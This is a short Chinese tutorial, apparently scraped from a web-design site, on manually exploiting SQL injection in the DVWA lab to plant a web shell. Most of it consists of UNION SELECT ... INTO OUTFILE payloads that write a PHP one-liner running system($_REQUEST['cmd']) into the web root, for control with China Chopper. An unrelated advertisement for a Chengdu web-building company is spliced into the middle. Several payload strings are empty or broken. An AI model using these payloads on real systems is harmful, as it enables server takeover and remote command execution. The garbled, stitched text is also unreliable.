SQLinject漏洞手工利用过程详解:getshell
思路:上传一个“后门”,通过控制后门来得到shell,比如一句话***。比如:
广平网站建设公司成都创新互联,广平网站设计制作,有大型网站制作公司丰富经验。已为广平成百上千提供企业网站建设服务。企业网站搭建\外贸营销网站建设要多少钱,请找那个售后服务好的广平做网站的公司定做!
//通过request提交,执行shell
//PHP一句话***,直接上菜刀
这里构造如下语句:
1'and 1=2 union select "",system($_REQUEST['cmd']);?>"
into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#
1' and 1=2 union select 1,"" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--
1' and 1=2 union select "","system($_REQUEST['cmd']);?>" into outfile "d:\\
xampp\\htdocs\\dvwa\\zzz.php"
1' and 1=2 union select 1,"" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#
分享名称:SQLinject漏洞手工利用过程详解:getshell
文章来源:http://pwwzsj.com/article/jpddgs.html